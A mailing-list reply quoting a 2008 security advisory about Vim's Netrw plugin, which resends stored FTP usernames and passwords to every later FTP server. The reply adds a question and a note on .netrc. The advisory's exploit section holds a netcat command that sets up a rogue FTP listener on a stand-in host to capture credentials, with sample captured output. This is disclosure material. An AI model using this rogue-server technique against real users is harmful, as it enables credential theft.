<<< Date Index >>>     <<< Thread Index >>>

Re: Vim: Netrw: FTP User Name and Password Disclosure



On 12/08/08 23:59, Jan Minář wrote:
Vim: Netrw: FTP User Name and Password Disclosure

1. SUMMARY

Product  : Vim -- Vi IMproved
Versions : Tested with Vim 7.1.266, 7.2, autoload/netrw.vim v131, v109
Impact   : Credentials disclosure
Wherefrom: Remote
Original : http://www.rdancer.org/vulnerablevim-netrw-credentials-dis.html

The Vim Netrw Plugin shares the FTP user name and password across all
FTP sessions.  Every time Vim makes a new FTP connection, it sends the
user name and password of the previous FTP session to the FTP server.


2. BACKGROUND

   ``Vim is an almost compatible version of the UNIX editor Vi.  Many new
     features have been added: multi-level undo, syntax highlighting,
     command line history, on-line help, spell checking, filename
     completion, block operations, etc.''

                -- Vim README.txt

   ``Netrw supports "transparent" editing of files on other machines
     using [...] vim ftp://hostname/path/to/file''

   ``Attempts to use ftp will prompt you for a user-id and a password.
     These will be saved in global variables g:netrw_uid and
     s:netrw_passwd; subsequent uses of ftp will re-use those two items
     to simplify the further use of ftp.  However, if you need to use a
     different user id and/or password, you'll want to call NetUserPass()
     first.''

                -- Netrw Reference Manual (``pi_netrw.txt'')


3. VULNERABILITY

Once vim successfully connects to an FTP server using a user name and
password credentials, it will re-use them in all subsequent FTP
sessions, regardless of the domain name or TCP port.

This behaviour is documented, although the documentation states the
credentials are ``retained on a per-session basis''.  Apparently the Vim
session, not the FTP session:

   ``g:netrw_uid      (ftp) user-id,    retained on a per-session basis
     s:netrw_passwd   (ftp) password,   retained on a per-session basis''

                -- Netrw Reference Manual (``pi_netrw.txt'')

Although FTP communication is not encrypted and therefore open to
eavesdropping, if the access to the network is protected, a
credentials-based access control is meaningful, and the credentials must
be kept secret.  For example, an FTP connection to a virtual Xen
instance on the same physical machine is secure; so is an FTP session
over a local ethernet segment secured against access from untrusted
parties.


4. EXPLOIT

No adversary action on the part of the attacker is necessary, apart from
keeping logs of the user name, password, source IP address, and other
information about the FTP session.

An example using netcat(1) for the rouge FTP server.  There is another
FTP server already running on the machine:

     # For the sake of this example, a custom hosts file.  Note that
     # ftp.secure.example and ftp.rogue.example map to different IP
     # addresses.
     $ grep '\.example' /etc/hosts
     127.0.1.1       ftp.secure.example
     127.0.1.2       ftp.rogue.example
     # There is a stock FTP server running already
     $ netstat -plan | grep ftp
     tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN 30623/vsftpd
     # Start the rogue FTP server
     $ printf '220\r\n331\r\n' \
     | netcat -lp 31337 ftp.rogue.example>  credentials&
     # We use the ex command for clarity.
     $ ex ftp://ftp.secure.example/
     Enter username: rdancer
     Enter Password: *************
     Entering Ex mode.  Type "visual" to go to Normal mode.
     :spl ftp://ftp.rogue.example:31337/
     "ftp://ftp.rogue.example:31337/";  --No lines in buffer--
     :qa!
     $ cat credentials
     USER rdancer
     PASS z5vS24u76OrGM


5. COPYRIGHT

This advisory is Copyright 2008 Jan Minar<rdancer@xxxxxxxxxxx>

Copying welcome, under the Creative Commons ``Attribution-Share Alike''
License http://creativecommons.org/licenses/by-sa/2.0/uk/

Code included herein, and accompanying this advisory, may be copied
according to the GNU General Public License version 2, or the Vim
license.  See the subdirectory ``licenses''.

Various portions of the accompanying code may have been written by
various parties.  Those parties may hold copyright, and those portions
may be copied according to their respective licenses.


6. HISTORY

2008-08-12 Sent to:<bugs@xxxxxxx>,<vim-dev@xxxxxxx>,
        <full-disclosure@xxxxxxxxxxxxxxxxx>,
        <bugtraq@xxxxxxxxxxxxxxxxx>,
           Charles E Campbell, Jr (Vim Netrw Plugin Maintainer)
        <drchip@xxxxxxxxxxxxxxxxxx>

If the attacker has access to full logs of the FTP back-and-forth talk, is it possible to keep the username and password secret?

Netrw mentions that if there exists a .netrc file (which ftp will use if it is not world-readable, e.g. on Linux it needs 600 permissions) which includes an applicable "machine" or "default" line, the user won't be asked for a username and password (see ":help netrw-netrc"). I'm not sure whether and to what degree this applies to non-Unix-like OSes such as Windows.


Best regards,
Tony.
--
Lysistrata had a good idea.